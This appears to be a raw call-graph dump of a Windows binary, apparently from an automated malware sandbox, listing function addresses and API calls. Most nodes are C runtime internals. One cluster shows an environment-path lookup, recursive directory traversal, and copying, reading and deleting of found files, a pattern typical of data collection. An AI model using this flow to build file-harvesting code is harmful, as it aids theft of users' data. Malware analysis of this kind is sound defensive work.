6504->6492 6506 344b604a 6505->6506 6510 344b6040 6505->6510 6507 344b5c45 __dosmaperr 5 API calls 6506->6507 6507->6510 6508 344b2ada _ValidateLocalCookies 5 API calls 6509 344b4abe 6508->6509 6509->6496 6509->6497 6510->6508 6512 344b34d7 6511->6512 6512->6415 6518 344b53ff 6513->6518 6525 344b5c2b 6518->6525 6521 344b391b 6522 344b354d 6521->6522 6523 344b3925 6521->6523 6522->6418 6536 344b3b2c 6523->6536 6526 344b2476 6525->6526 6527 344b5c35 6525->6527 6526->6521 6529 344b5db2 6527->6529 6530 344b5c45 __dosmaperr 5 API calls 6529->6530 6531 344b5dd9 6530->6531 6532 344b5df1 TlsFree 6531->6532 6533 344b5de5 6531->6533 6532->6533 6534 344b2ada _ValidateLocalCookies 5 API calls 6533->6534 6535 344b5e02 6534->6535 6535->6526 6541 344b3a82 6536->6541 6538 344b3b46 6539 344b3b5e TlsFree 6538->6539 6540 344b3b52 6538->6540 6539->6540 6540->6522 6542 344b3aaa 6541->6542 6546 344b3aa6 __crt_fast_encode_pointer 6541->6546 6542->6546 6547 344b39be 6542->6547 6545 344b3ac4 GetProcAddress 6545->6546 6546->6538 6550 344b39cd try_get_first_available_module 6547->6550 6548 344b3a77 6548->6545 6548->6546 6549 344b39ea LoadLibraryExW 6549->6550 6551 344b3a05 GetLastError 6549->6551 6550->6548 6550->6549 6552 344b3a60 FreeLibrary 6550->6552 6553 344b3a38 LoadLibraryExW 6550->6553 6551->6550 6552->6550 6553->6550 6565 344b74da 6554->6565 6557 344b3529 6558 344b3532 6557->6558 6564 344b3543 6557->6564 6559 344b391b ___vcrt_uninitialize_ptd 6 API calls 6558->6559 6560 344b3537 6559->6560 6569 344b3972 6560->6569 6564->6421 6568 344b74f3 6565->6568 6566 344b2ada _ValidateLocalCookies 5 API calls 6567 344b2625 6566->6567 6567->6557 6568->6566 6570 344b353c 6569->6570 6571 344b397d 6569->6571 6573 344b3c50 6570->6573 6572 344b3987 RtlDeleteCriticalSection 6571->6572 6572->6570 6572->6572 6574 344b3c7f 6573->6574 6576 344b3c59 6573->6576 6574->6564 6575 344b3c69 FreeLibrary 6575->6576 6576->6574 6576->6575 7480 344b5348 7481 344b3529 ___vcrt_uninitialize 8 API calls 7480->7481 7482 344b534f 7481->7482 7483 344b7b48 7493 344b8ebf 7483->7493 7487 344b7b55 7506 344b907c 7487->7506 7490 344b7b7f 7491 344b571e _free 20 API calls 7490->7491 7492 344b7b8a 7491->7492 7510 344b8ec8 7493->7510 7495 344b7b50 7496 344b8fdc 7495->7496 7497 344b8fe8 ___DestructExceptionObject 7496->7497 7530 344b5671 RtlEnterCriticalSection 7497->7530 7499 344b905e 7544 344b9073 7499->7544 7501 344b8ff3 7501->7499 7503 344b9032 RtlDeleteCriticalSection 7501->7503 7531 344ba09c 7501->7531 7502 344b906a _abort 7502->7487 7504 344b571e _free 20 API calls 7503->7504 7504->7501 7507 344b9092 7506->7507 7508 344b7b64 RtlDeleteCriticalSection 7506->7508 7507->7508 7509 344b571e _free 20 API calls 7507->7509 7508->7487 7508->7490 7509->7508 7511 344b8ed4 ___DestructExceptionObject 7510->7511 7520 344b5671 RtlEnterCriticalSection 7511->7520 7513 344b8f77 7525 344b8f97 7513->7525 7516 344b8f83 _abort 7516->7495 7518 344b8ee3 7518->7513 7519 344b8e78 66 API calls 7518->7519 7521 344b7b94 RtlEnterCriticalSection 7518->7521 7522 344b8f6d 7518->7522 7519->7518 7520->7518 7521->7518 7528 344b7ba8 RtlLeaveCriticalSection 7522->7528 7524 344b8f75 7524->7518 7529 344b56b9 RtlLeaveCriticalSection 7525->7529 7527 344b8f9e 7527->7516 7528->7524 7529->7527 7530->7501 7532 344ba0a8 ___DestructExceptionObject 7531->7532 7533 344ba0b9 7532->7533 7534 344ba0ce 7532->7534 7535 344b6368 _free 20 API calls 7533->7535 7536 344ba0c9 _abort 7534->7536 7547 344b7b94 RtlEnterCriticalSection 7534->7547 7537 344ba0be 7535->7537 7536->7501 7539 344b62ac ___std_exception_copy 26 API calls 7537->7539 7539->7536 7540 344ba0ea 7548 344ba026 7540->7548 7542 344ba0f5 7564 344ba112 7542->7564 7812 344b56b9 RtlLeaveCriticalSection 7544->7812 7546 344b907a 7546->7502 7547->7540 7549 344ba048 7548->7549 7550 344ba033 7548->7550 7556 344ba043 7549->7556 7567 344b8e12 7549->7567 7551 344b6368 _free 20 API calls 7550->7551 7552 344ba038 7551->7552 7554 344b62ac ___std_exception_copy 26 API calls 7552->7554 7554->7556 7556->7542 7557 344b907c 20 API calls 7558 344ba064 7557->7558 7573 344b7a5a 7558->7573 7560 344ba06a 7580 344badce 7560->7580 7563 344b571e _free 20 API calls 7563->7556 7811 344b7ba8 RtlLeaveCriticalSection 7564->7811 7566 344ba11a 7566->7536 7568 344b8e2a 7567->7568 7572 344b8e26 7567->7572 7569 344b7a5a 26 API calls 7568->7569 7568->7572 7570 344b8e4a 7569->7570 7595 344b9a22 7570->7595 7572->7557 7574 344b7a7b 7573->7574 7575 344b7a66 7573->7575 7574->7560 7576 344b6368 _free 20 API calls 7575->7576 7577 344b7a6b 7576->7577 7578 344b62ac ___std_exception_copy 26 API calls 7577->7578 7579 344b7a76 7578->7579 7579->7560 7581 344baddd 7580->7581 7582 344badf2 7580->7582 7584 344b6355 __dosmaperr 20 API calls 7581->7584 7583 344bae2d 7582->7583 7587 344bae19 7582->7587 7585 344b6355 __dosmaperr 20 API calls 7583->7585 7586 344bade2 7584->7586 7588 344bae32 7585->7588 7589 344b6368 _free 20 API calls 7586->7589 7768 344bada6 7587->7768 7591 344b6368 _free 20 API calls 7588->7591 7592 344ba070 7589->7592 7593 344bae3a 7591->7593 7592->7556 7592->7563 7594 344b62ac ___std_exception_copy 26 API calls 7593->7594 7594->7592 7596 344b9a2e ___DestructExceptionObject 7595->7596 7597 344b9a4e 7596->7597 7598 344b9a36 7596->7598 7599 344b9aec 7597->7599 7605 344b9a83 7597->7605 7620 344b6355 7598->7620 7602 344b6355 __dosmaperr 20 API calls 7599->7602 7604 344b9af1 7602->7604 7603 344b6368 _free 20 API calls 7617 344b9a43 _abort 7603->7617 7606 344b6368 _free 20 API calls 7604->7606 7623 344b8c7b RtlEnterCriticalSection 7605->7623 7608 344b9af9 7606->7608 7610 344b62ac ___std_exception_copy 26 API calls 7608->7610 7609 344b9a89 7611 344b9aba 7609->7611 7612 344b9aa5 7609->7612 7610->7617 7624 344b9b0d 7611->7624 7613 344b6368 _free 20 API calls 7612->7613 7616 344b9aaa 7613->7616 7615 344b9ab5 7675 344b9ae4 7615->7675 7618 344b6355 __dosmaperr 20 API calls 7616->7618 7617->7572 7618->7615 7621 344b5b7a __dosmaperr 20 API calls 7620->7621 7622 344b635a 7621->7622 7622->7603 7623->7609 7625 344b9b3b 7624->7625 7663 344b9b34 7624->7663 7626 344b9b3f 7625->7626 7627 344b9b5e 7625->7627 7629 344b6355 __dosmaperr 20 API calls 7626->7629 7630 344b9baf 7627->7630 7631 344b9b92 7627->7631 7628 344b2ada _ValidateLocalCookies 5 API calls 7632 344b9d15 7628->7632 7633 344b9b44 7629->7633 7635 344b9bc5 7630->7635 7678 344ba00b 7630->7678 7634 344b6355 __dosmaperr 20 API calls 7631->7634 7632->7615 7636 344b6368 _free 20 API calls 7633->7636 7638 344b9b97 7634->7638 7681 344b96b2 7635->7681 7640 344b9b4b 7636->7640 7642 344b6368 _free 20 API calls 7638->7642 7643 344b62ac ___std_exception_copy 26 API calls 7640->7643 7646 344b9b9f 7642->7646 7643->7663 7644 344b9c0c 7650 344b9c20 7644->7650 7651 344b9c66 WriteFile 7644->7651 7645 344b9bd3 7647 344b9bf9 7645->7647 7648 344b9bd7 7645->7648 7649 344b62ac ___std_exception_copy 26 API calls 7646->7649 7693 344b9492 GetConsoleCP 7647->7693 7652 344b9ccd 7648->7652 7688 344b9645 7648->7688 7649->7663 7655 344b9c28 7650->7655 7656 344b9c56 7650->7656 7654 344b9c89 GetLastError 7651->7654 7659 344b9bef 7651->7659 7652->7663 7664 344b6368 _free 20 API calls 7652->7664 7654->7659 7660 344b9c2d 7655->7660 7661 344b9c46 7655->7661 7719 344b9728 7656->7719 7659->7652 7659->7663 7667 344b9ca9 7659->7667 7660->7652 7704 344b9807 7660->7704 7711 344b98f5 7661->7711 7663->7628 7666 344b9cf2 7664->7666 7668 344b6355 __dosmaperr 20 API calls 7666->7668 7669 344b9cb0 7667->7669 7670 344b9cc4 7667->7670 7668->7663 7671 344b6368 _free 20 API calls 7669->7671 7726 344b6332 7670->7726 7673 344b9cb5 7671->7673 7674 344b6355 __dosmaperr 20 API calls 7673->7674 7674->7663 7767 344b8c9e RtlLeaveCriticalSection 7675->7767 7677 344b9aea 7677->7617 7731 344b9f8d 7678->7731 7753 344b8dbc 7681->7753 7683 344b96c2 7684 344b96c7 7683->7684 7685 344b5af6 _abort 38 API calls 7683->7685 7684->7644 7684->7645 7686 344b96ea 7685->7686 7686->7684 7687 344b9708 GetConsoleMode 7686->7687 7687->7684 7689 344b969f 7688->7689 7692 344b966a 7688->7692 7689->7659 7690 344ba181 WriteConsoleW CreateFileW 7690->7692 7691 344b96a1 GetLastError 7691->7689 7692->7689 7692->7690 7692->7691 7698 344b9607 7693->7698 7702 344b94f5 7693->7702 7694 344b2ada _ValidateLocalCookies 5 API calls 7695 344b9641 7694->7695 7695->7659 7697 344b79e6 40 API calls __fassign 7697->7702 7698->7694 7699 344b957b WideCharToMultiByte 7699->7698 7700 344b95a1 WriteFile 7699->7700 7701 344b962a GetLastError 7700->7701 7700->7702 7701->7698 7702->7697 7702->7698 7702->7699 7703 344b95d2 WriteFile 7702->7703 7762 344b7c19 7702->7762 7703->7701 7703->7702 7705 344b9816 7704->7705 7706 344b98d8 7705->7706 7708 344b9894 WriteFile 7705->7708 7707 344b2ada _ValidateLocalCookies 5 API calls 7706->7707 7709 344b98f1 7707->7709 7708->7705 7710 344b98da GetLastError 7708->7710 7709->7659 7710->7706 7713 344b9904 7711->7713 7712 344b9a0f 7714 344b2ada _ValidateLocalCookies 5 API calls 7712->7714 7713->7712 7715 344b9986 WideCharToMultiByte 7713->7715 7717 344b99bb WriteFile 7713->7717 7716 344b9a1e 7714->7716 7715->7717 7718 344b9a07 GetLastError 7715->7718 7716->7659 7717->7713 7717->7718 7718->7712 7723 344b9737 7719->7723 7720 344b97ea 7722 344b2ada _ValidateLocalCookies 5 API calls 7720->7722 7721 344b97a9 WriteFile 7721->7723 7724 344b97ec GetLastError 7721->7724 7725 344b9803 7722->7725 7723->7720 7723->7721 7724->7720 7725->7659 7727 344b6355 __dosmaperr 20 API calls 7726->7727 7728 344b633d _free 7727->7728 7729 344b6368 _free 20 API calls 7728->7729 7730 344b6350 7729->7730 7730->7663 7740 344b8d52 7731->7740 7733 344b9f9f 7734 344b9fb8 SetFilePointerEx 7733->7734 7735 344b9fa7 7733->7735 7737 344b9fac 7734->7737 7738 344b9fd0 GetLastError 7734->7738 7736 344b6368 _free 20 API calls 7735->7736 7736->7737 7737->7635 7739 344b6332 __dosmaperr 20 API calls 7738->7739 7739->7737 7741 344b8d5f 7740->7741 7742 344b8d74 7740->7742 7743 344b6355 __dosmaperr 20 API calls 7741->7743 7745 344b6355 __dosmaperr 20 API calls 7742->7745 7748 344b8d99 7742->7748 7744 344b8d64 7743->7744 7747 344b6368 _free 20 API calls 7744->7747 7746 344b8da4 7745->7746 7749 344b6368 _free 20 API calls 7746->7749 7750 344b8d6c 7747->7750 7748->7733 7751 344b8dac 7749->7751 7750->7733 7752 344b62ac ___std_exception_copy 26 API calls 7751->7752 7752->7750 7754 344b8dc9 7753->7754 7756 344b8dd6 7753->7756 7755 344b6368 _free 20 API calls 7754->7755 7757 344b8dce 7755->7757 7758 344b8de2 7756->7758 7759 344b6368 _free 20 API calls 7756->7759 7757->7683 7758->7683 7760 344b8e03 7759->7760 7761 344b62ac ___std_exception_copy 26 API calls 7760->7761 7761->7757 7763 344b5af6 _abort 38 API calls 7762->7763 7764 344b7c24 7763->7764 7765 344b7a00 __fassign 38 API calls 7764->7765 7766 344b7c34 7765->7766 7766->7702 7767->7677 7771 344bad24 7768->7771 7770 344badca 7770->7592 7772 344bad30 ___DestructExceptionObject 7771->7772 7782 344b8c7b RtlEnterCriticalSection 7772->7782 7774 344bad3e 7775 344bad70 7774->7775 7776 344bad65 7774->7776 7778 344b6368 _free 20 API calls 7775->7778 7783 344bae4d 7776->7783 7779 344bad6b 7778->7779 7798 344bad9a 7779->7798 7781 344bad8d _abort 7781->7770 7782->7774 7784 344b8d52 26 API calls 7783->7784 7787 344bae5d 7784->7787 7785 344bae63 7801 344b8cc1 7785->7801 7787->7785 7788 344bae95 7787->7788 7791 344b8d52 26 API calls 7787->7791 7788->7785 7789 344b8d52 26 API calls 7788->7789 7792 344baea1 CloseHandle 7789->7792 7794 344bae8c 7791->7794 7792->7785 7795 344baead GetLastError 7792->7795 7793 344baedd 7793->7779 7797 344b8d52 26 API calls 7794->7797 7795->7785 7796 344b6332 __dosmaperr 20 API calls 7796->7793 7797->7788 7810 344b8c9e RtlLeaveCriticalSection 7798->7810 7800 344bada4 7800->7781 7802 344b8cd0 7801->7802 7803 344b8d37 7801->7803 7802->7803 7809 344b8cfa 7802->7809 7804 344b6368 _free 20 API calls 7803->7804 7805 344b8d3c 7804->7805 7806 344b6355 __dosmaperr 20 API calls 7805->7806 7807 344b8d27 7806->7807 7807->7793 7807->7796 7808 344b8d21 SetStdHandle 7808->7807 7809->7807 7809->7808 7810->7800 7811->7566 7812->7546 6577 344b284f 6580 344b2882 6577->6580 6583 344b3550 6580->6583 6582 344b285d 6584 344b355d 6583->6584 6587 344b358a 6583->6587 6585 344b47e5 ___std_exception_copy 21 API calls 6584->6585 6584->6587 6586 344b357a 6585->6586 6586->6587 6589 344b544d 6586->6589 6587->6582 6591 344b545a 6589->6591 6593 344b5468 6589->6593 6590 344b6368 _free 20 API calls 6592 344b5470 6590->6592 6591->6593 6596 344b547f 6591->6596 6598 344b62ac 6592->6598 6593->6590 6595 344b547a 6595->6587 6596->6595 6597 344b6368 _free 20 API calls 6596->6597 6597->6592 6601 344b6231 6598->6601 6600 344b62b8 6600->6595 6602 344b5b7a __dosmaperr 20 API calls 6601->6602 6603 344b6247 6602->6603 6604 344b62a6 6603->6604 6607 344b6255 6603->6607 6612 344b62bc IsProcessorFeaturePresent 6604->6612 6606 344b62ab 6608 344b6231 ___std_exception_copy 26 API calls 6606->6608 6609 344b2ada _ValidateLocalCookies 5 API calls 6607->6609 6610 344b62b8 6608->6610 6611 344b627c 6609->6611 6610->6600 6611->6600 6613 344b62c7 6612->6613 6616 344b60e2 6613->6616 6617 344b60fe ___scrt_fastfail 6616->6617 6618 344b612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6617->6618 6621 344b61fb ___scrt_fastfail 6618->6621 6619 344b2ada _ValidateLocalCookies 5 API calls 6620 344b6219 GetCurrentProcess TerminateProcess 6619->6620 6620->6606 6621->6619 6622 344b724e GetProcessHeap 7813 344baf43 7814 344baf59 7813->7814 7815 344baf4d 7813->7815 7815->7814 7816 344baf52 CloseHandle 7815->7816 7816->7814 6623 344b8640 6626 344b8657 6623->6626 6627 344b8679 6626->6627 6628 344b8665 6626->6628 6629 344b8693 6627->6629 6630 344b8681 6627->6630 6631 344b6368 _free 20 API calls 6628->6631 6638 344b8652 6629->6638 6639 344b54a7 6629->6639 6632 344b6368 _free 20 API calls 6630->6632 6633 344b866a 6631->6633 6634 344b8686 6632->6634 6636 344b62ac ___std_exception_copy 26 API calls 6633->6636 6637 344b62ac ___std_exception_copy 26 API calls 6634->6637 6636->6638 6637->6638 6640 344b54c4 6639->6640 6646 344b54ba 6639->6646 6640->6646 6647 344b5af6 GetLastError 6640->6647 6642 344b54e5 6667 344b7a00 6642->6667 6646->6638 6648 344b5b0c 6647->6648 6651 344b5b12 6647->6651 6649 344b5e08 __dosmaperr 11 API calls 6648->6649 6649->6651 6650 344b637b __dosmaperr 20 API calls 6652 344b5b24 6650->6652 6651->6650 6653 344b5b61 SetLastError 6651->6653 6654 344b5b2c 6652->6654 6655 344b5e5e __dosmaperr 11 API calls 6652->6655 6653->6642 6657 344b571e _free 20 API calls 6654->6657 6656 344b5b41 6655->6656 6656->6654 6658 344b5b48 6656->6658 6659 344b5b32 6657->6659 6660 344b593c __dosmaperr 20 API calls 6658->6660 6661 344b5b6d SetLastError 6659->6661 6662 344b5b53 6660->6662 6675 344b55a8 6661->6675 6664 344b571e _free 20 API calls 6662->6664 6666 344b5b5a 6664->6666 6666->6653 6666->6661 6668 344b54fe 6667->6668 6669 344b7a13 6667->6669 6671 344b7a2d 6668->6671 6669->6668 6743 344b7f0f 6669->6743 6672 344b7a40 6671->6672 6673 344b7a55 6671->6673 6672->6673 6878 344b6d7e 6672->6878 6673->6646 6686 344b7613 6675->6686 6679 344b55e0 6716 344b4bc1 6679->6716 6680 344b55c2 IsProcessorFeaturePresent 6682 344b55cd 6680->6682 6681 344b55b8 6681->6679 6681->6680 6685 344b60e2 _abort 8 API calls 6682->6685 6685->6679 6719 344b7581 6686->6719 6689 344b766e 6690 344b767a _abort 6689->6690 6691 344b5b7a __dosmaperr 20 API calls 6690->6691 6695 344b76a7 _abort 6690->6695 6697 344b76a1 _abort 6690->6697 6691->6697 6692 344b76f3 6693 344b6368 _free 20 API calls 6692->6693 6694 344b76f8 6693->6694 6698 344b62ac ___std_exception_copy 26 API calls 6694->6698 6702 344b771f 6695->6702 6733 344b5671 RtlEnterCriticalSection 6695->6733 6696 344bbdc9 _abort 5 API calls 6699 344b7875 6696->6699 6697->6692 6697->6695 6700 344b76d6 6697->6700 6698->6700 6699->6681 6700->6696 6705 344b777e 6702->6705 6708 344b7776 6702->6708 6713 344b77a9 6702->6713 6734 344b56b9 RtlLeaveCriticalSection 6702->6734 6705->6713 6735 344b7665 6705->6735 6707 344b4bc1 _abort 28 API calls 6707->6705 6708->6707 6711 344b5af6 _abort 38 API calls 6714 344b780c 6711->6714 6712 344b7665 _abort 38 API calls 6712->6713 6738 344b782e 6713->6738 6714->6700 6715 344b5af6 _abort 38 API calls 6714->6715 6715->6700 6717 344b499b _abort 28 API calls 6716->6717 6718 344b4bd2 6717->6718 6722 344b7527 6719->6722 6721 344b55ad 6721->6681 6721->6689 6723 344b7533 ___DestructExceptionObject 6722->6723 6728 344b5671 RtlEnterCriticalSection 6723->6728 6725 344b7541 6729 344b7575 6725->6729 6727 344b7568 _abort 6727->6721 6728->6725 6732 344b56b9 RtlLeaveCriticalSection 6729->6732 6731 344b757f 6731->6727 6732->6731 6733->6702 6734->6708 6736 344b5af6 _abort 38 API calls 6735->6736 6737 344b766a 6736->6737 6737->6712 6739 344b7834 6738->6739 6741 344b77fd 6738->6741 6742 344b56b9 RtlLeaveCriticalSection 6739->6742 6741->6700 6741->6711 6741->6714 6742->6741 6744 344b7f1b ___DestructExceptionObject 6743->6744 6745 344b5af6 _abort 38 API calls 6744->6745 6746 344b7f24 6745->6746 6747 344b7f72 _abort 6746->6747 6755 344b5671 RtlEnterCriticalSection 6746->6755 6747->6668 6749 344b7f42 6756 344b7f86 6749->6756 6754 344b55a8 _abort 38 API calls 6754->6747 6755->6749 6757 344b7f56 6756->6757 6758 344b7f94 __fassign 6756->6758 6760 344b7f75 6757->6760 6758->6757 6763 344b7cc2 6758->6763 6877 344b56b9 RtlLeaveCriticalSection 6760->6877 6762 344b7f69 6762->6747 6762->6754 6764 344b7d42 6763->6764 6770 344b7cd8 6763->6770 6766 344b571e _free 20 API calls 6764->6766 6789 344b7d90 6764->6789 6767 344b7d64 6766->6767 6768 344b571e _free 20 API calls 6767->6768 6771 344b7d77 6768->6771 6769 344b7d0b 6775 344b571e _free 20 API calls 6769->6775 6790 344b7d2d 6769->6790 6770->6764 6770->6769 6773 344b571e _free 20 API calls 6770->6773 6774 344b571e _free 20 API calls 6771->6774 6772 344b571e _free 20 API calls 6776 344b7d37 6772->6776 6778 344b7d00 6773->6778 6780 344b7d85 6774->6780 6781 344b7d22 6775->6781 6782 344b571e _free 20 API calls 6776->6782 6777 344b7dfe 6783 344b571e _free 20 API calls 6777->6783 6791 344b90ba 6778->6791 6785 344b571e _free 20 API calls 6780->6785 6819 344b91b8 6781->6819 6782->6764 6787 344b7e04 6783->6787 6784 344b7d9e 6784->6777 6788 344b571e 20 API calls _free 6784->6788 6785->6789 6787->6757 6788->6784 6831 344b7e35 6789->6831 6790->6772 6792 344b90cb 6791->6792 6818 344b91b4 6791->6818 6793 344b90dc 6792->6793 6794 344b571e _free 20 API calls 6792->6794 6795 344b90ee 6793->6795 6796 344b571e _free 20 API calls 6793->6796 6794->6793 6797 344b9100 6795->6797 6798 344b571e _free 20 API calls 6795->6798 6796->6795 6799 344b9112 6797->6799 6801 344b571e _free 20 API calls 6797->6801 6798->6797 6800 344b9124 6799->6800 6802 344b571e _free 20 API calls 6799->6802 6803 344b9136 6800->6803 6804 344b571e _free 20 API calls 6800->6804 6801->6799 6802->6800 6805 344b9148 6803->6805 6806 344b571e _free 20 API calls 6803->6806 6804->6803 6807 344b571e _free 20 API calls 6805->6807 6811 344b915a 6805->6811 6806->6805 6807->6811 6808 344b571e _free 20 API calls 6809 344b916c 6808->6809 6810 344b917e 6809->6810 6812 344b571e _free 20 API calls 6809->6812 6813 344b9190 6810->6813 6814 344b571e _free 20 API calls 6810->6814 6811->6808 6811->6809 6812->6810 6815 344b91a2 6813->6815 6816 344b571e _free 20 API calls 6813->6816 6814->6813 6817 344b571e _free 20 API calls 6815->6817 6815->6818 6816->6815 6817->6818 6818->6769 6820 344b91c5 6819->6820 6830 344b921d 6819->6830 6821 344b91d5 6820->6821 6822 344b571e _free 20 API calls 6820->6822 6823 344b571e _free 20 API calls 6821->6823 6824 344b91e7 6821->6824 6822->6821 6823->6824 6825 344b571e _free 20 API calls 6824->6825 6827 344b91f9 6824->6827 6825->6827 6826 344b920b 6829 344b571e _free 20 API calls 6826->6829 6826->6830 6827->6826 6828 344b571e _free 20 API calls 6827->6828 6828->6826 6829->6830 6830->6790 6832 344b7e42 6831->6832 6836 344b7e60 6831->6836 6832->6836 6837 344b925d 6832->6837 6835 344b571e _free 20 API calls 6835->6836 6836->6784 6838 344b7e5a 6837->6838 6839 344b926e 6837->6839 6838->6835 6873 344b9221 6839->6873 6842 344b9221 __fassign 20 API calls 6843 344b9281 6842->6843 6844 344b9221 __fassign 20 API calls 6843->6844 6845 344b928c 6844->6845 6846 344b9221 __fassign 20 API calls 6845->6846 6847 344b9297 6846->6847 6848 344b9221 __fassign 20 API calls 6847->6848 6849 344b92a5 6848->6849 6850 344b571e _free 20 API calls 6849->6850 6851 344b92b0 6850->6851 6852 344b571e _free 20 API calls 6851->6852 6853 344b92bb 6852->6853 6854 344b571e _free 20 API calls 6853->6854 6855 344b92c6 6854->6855 6856 344b9221 __fassign 20 API calls 6855->6856 6857 344b92d4 6856->6857 6858 344b9221 __fassign 20 API calls 6857->6858 6859 344b92e2 6858->6859 6860 344b9221 __fassign 20 API calls 6859->6860 6861 344b92f3 6860->6861 6862 344b9221 __fassign 20 API calls 6861->6862 6863 344b9301 6862->6863 6864 344b9221 __fassign 20 API calls 6863->6864 6865 344b930f 6864->6865 6866 344b571e _free 20 API calls 6865->6866 6867 344b931a 6866->6867 6868 344b571e _free 20 API calls 6867->6868 6869 344b9325 6868->6869 6870 344b571e _free 20 API calls 6869->6870 6871 344b9330 6870->6871 6872 344b571e _free 20 API calls 6871->6872 6872->6838 6874 344b9258 6873->6874 6875 344b9248 6873->6875 6874->6842 6875->6874 6876 344b571e _free 20 API calls 6875->6876 6876->6875 6877->6762 6879 344b6d8a ___DestructExceptionObject 6878->6879 6880 344b5af6 _abort 38 API calls 6879->6880 6882 344b6d94 6880->6882 6883 344b6e18 _abort 6882->6883 6884 344b55a8 _abort 38 API calls 6882->6884 6886 344b571e _free 20 API calls 6882->6886 6887 344b5671 RtlEnterCriticalSection 6882->6887 6888 344b6e0f 6882->6888 6883->6673 6884->6882 6886->6882 6887->6882 6891 344b56b9 RtlLeaveCriticalSection 6888->6891 6890 344b6e16 6890->6882 6891->6890 7984 344b7bc7 7985 344b7bd3 ___DestructExceptionObject 7984->7985 7986 344b7c0a _abort 7985->7986 7992 344b5671 RtlEnterCriticalSection 7985->7992 7988 344b7be7 7989 344b7f86 __fassign 20 API calls 7988->7989 7990 344b7bf7 7989->7990 7993 344b7c10 7990->7993 7992->7988 7996 344b56b9 RtlLeaveCriticalSection 7993->7996 7995 344b7c17 7995->7986 7996->7995 7997 344ba1c6 IsProcessorFeaturePresent 7817 344ba945 7821 344ba96d 7817->7821 7818 344ba9a5 7819 344ba99e 7830 344baa00 7819->7830 7820 344ba997 7826 344baa17 7820->7826 7821->7818 7821->7819 7821->7820 7827 344baa20 7826->7827 7834 344bb19b 7827->7834 7831 344baa20 7830->7831 7832 344bb19b __startOneArgErrorHandling 21 API calls 7831->7832 7833 344ba9a3 7832->7833 7835 344bb1da 7834->7835 7840 344bb25c __startOneArgErrorHandling 7835->7840 7844 344bb59e 7835->7844 7837 344bb286 7838 344bb8b2 __startOneArgErrorHandling 20 API calls 7837->7838 7839 344bb292 7837->7839 7838->7839 7842 344b2ada _ValidateLocalCookies 5 API calls 7839->7842 7840->7837 7841 344b78a3 __startOneArgErrorHandling 5 API calls 7840->7841 7841->7837 7843 344ba99c 7842->7843 7845 344bb5c1 __raise_exc RaiseException 7844->7845 7846 344bb5bc 7845->7846 7846->7840 6132 344b1c5b 6133 344b1c6b ___scrt_fastfail 6132->6133 6136 344b12ee 6133->6136 6135 344b1c87 6137 344b1324 ___scrt_fastfail 6136->6137 6138 344b13b7 GetEnvironmentVariableW 6137->6138 6162 344b10f1 6138->6162 6141 344b10f1 57 API calls 6142 344b1465 6141->6142 6143 344b10f1 57 API calls 6142->6143 6144 344b1479 6143->6144 6145 344b10f1 57 API calls 6144->6145 6146 344b148d 6145->6146 6147 344b10f1 57 API calls 6146->6147 6148 344b14a1 6147->6148 6149 344b10f1 57 API calls 6148->6149 6150 344b14b5 lstrlenW 6149->6150 6151 344b14d9 lstrlenW 6150->6151 6161 344b14d2 6150->6161 6152 344b10f1 57 API calls 6151->6152 6153 344b1501 lstrlenW lstrcatW 6152->6153 6154 344b10f1 57 API calls 6153->6154 6155 344b1539 lstrlenW lstrcatW 6154->6155 6156 344b10f1 57 API calls 6155->6156 6157 344b156b lstrlenW lstrcatW 6156->6157 6158 344b10f1 57 API calls 6157->6158 6159 344b159d lstrlenW lstrcatW 6158->6159 6160 344b10f1 57 API calls 6159->6160 6160->6161 6161->6135 6163 344b1118 ___scrt_fastfail 6162->6163 6164 344b1129 lstrlenW 6163->6164 6175 344b2c40 6164->6175 6166 344b1148 lstrcatW lstrlenW 6167 344b1168 lstrlenW 6166->6167 6168 344b1177 lstrlenW FindFirstFileW 6166->6168 6167->6168 6169 344b11e1 6168->6169 6170 344b11a0 6168->6170 6169->6141 6171 344b11aa 6170->6171 6172 344b11c7 FindNextFileW 6170->6172 6171->6172 6177 344b1000 6171->6177 6172->6170 6173 344b11da FindClose 6172->6173 6173->6169 6176 344b2c57 6175->6176 6176->6166 6176->6176 6178 344b1022 ___scrt_fastfail 6177->6178 6179 344b10af 6178->6179 6180 344b102f lstrcatW lstrlenW 6178->6180 6181 344b10b5 lstrlenW 6179->6181 6192 344b10ad 6179->6192 6182 344b106b lstrlenW 6180->6182 6183 344b105a lstrlenW 6180->6183 6208 344b1e16 6181->6208 6194 344b1e89 lstrlenW 6182->6194 6183->6182 6186 344b10ca 6189 344b1e89 5 API calls 6186->6189 6186->6192 6187 344b1088 GetFileAttributesW 6188 344b109c 6187->6188 6187->6192 6188->6192 6200 344b173a 6188->6200 6191 344b10df 6189->6191 6213 344b11ea 6191->6213 6192->6171 6195 344b2c40 ___scrt_fastfail 6194->6195 6196 344b1ea7 lstrcatW lstrlenW 6195->6196 6197 344b1ec2 6196->6197 6198 344b1ed1 lstrcatW 6196->6198 6197->6198 6199 344b1ec7 lstrlenW 6197->6199 6198->6187 6199->6198 6201 344b1747 ___scrt_fastfail 6200->6201 6228 344b1cca 6201->6228 6204 344b199f 6204->6192 6207 344b1824 ___scrt_fastfail _strlen 6207->6204 6248 344b15da 6207->6248 6209 344b1e29 6208->6209 6212 344b1e4c 6208->6212 6210 344b1e2d lstrlenW 6209->6210 6209->6212 6211 344b1e3f lstrlenW 6210->6211 6210->6212 6211->6212 6212->6186 6214 344b120e ___scrt_fastfail 6213->6214 6215 344b1e89 5 API calls 6214->6215 6216 344b1220 GetFileAttributesW 6215->6216 6217 344b1246 6216->6217 6218 344b1235 6216->6218 6219 344b1e89 5 API calls 6217->6219 6218->6217 6220 344b173a 35 API calls 6218->6220 6221 344b1258 6219->6221 6220->6217 6222 344b10f1 56 API calls 6221->6222 6223 344b126d 6222->6223 6224 344b1e89 5 API calls 6223->6224 6225 344b127f ___scrt_fastfail 6224->6225 6226 344b10f1 56 API calls 6225->6226 6227 344b12e6 6226->6227 6227->6192 6229 344b1cf1 ___scrt_fastfail 6228->6229 6230 344b1d0f CopyFileW CreateFileW 6229->6230 6231 344b1d55 GetFileSize 6230->6231 6232 344b1d44 DeleteFileW 6230->6232 6233 344b1ede 22 API calls 6231->6233 6237 344b1808 6232->6237 6234 344b1d66 ReadFile 6233->6234 6235 344b1d7d CloseHandle DeleteFileW 6234->6235 6236 344b1d94 CloseHandle DeleteFileW 6234->6236 6235->6237 6236->6237 6237->6204 6238 344b1ede 6237->6238 6240 344b222f 6238->6240 6241 344b224e 6240->6241 6244 344b2250 6240->6244 6256 344b474f 6240->6256 6261 344b47e5 